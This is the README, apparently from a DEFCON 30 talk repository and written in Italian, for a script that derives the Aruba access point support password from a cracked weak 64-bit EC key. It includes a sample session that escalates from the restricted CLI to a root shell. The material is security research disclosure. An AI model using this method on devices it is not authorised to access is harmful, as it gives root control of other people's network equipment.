
Materiale di supporto per il talk "Hunting Bugs In The Tropics" del DEFCON 30.
Questa è una repository con le slide usate nella mia presentazione "Hunting Bugs in the Tropics" al DEFCON30. Include lo script Python usato per calcolare la password di supporto basata sulla chiave privata ottenuta violando la chiave pubblica EC del supporto Aruba, a causa della sua dimensione debole (64 bit). Questo consente di uscire dalla subshell su questi dispositivi e ottenere una shell root completa.
Puoi usarlo eseguendo support sulla CLI AP e fornendo un nome utente arbitrario:
# support
Username (Please enter with @domain.com, in lowercase): a
Token: ED14-B132-D4BB-D428
Please generate one time password at https://ase.arubanetworks.com/decode_aos_key
Support Password:
quindi passando il nome utente e il valore del Token allo script support-access.py in questa repository.
$ ./support-access.py a ED14-B132-D4BB-D428
Password: 4197d68283f73d5c
Incolla la risposta come password di supporto:
Support Password: 4197d68283f73d5c
Switching to Full Access
~ # whoami
root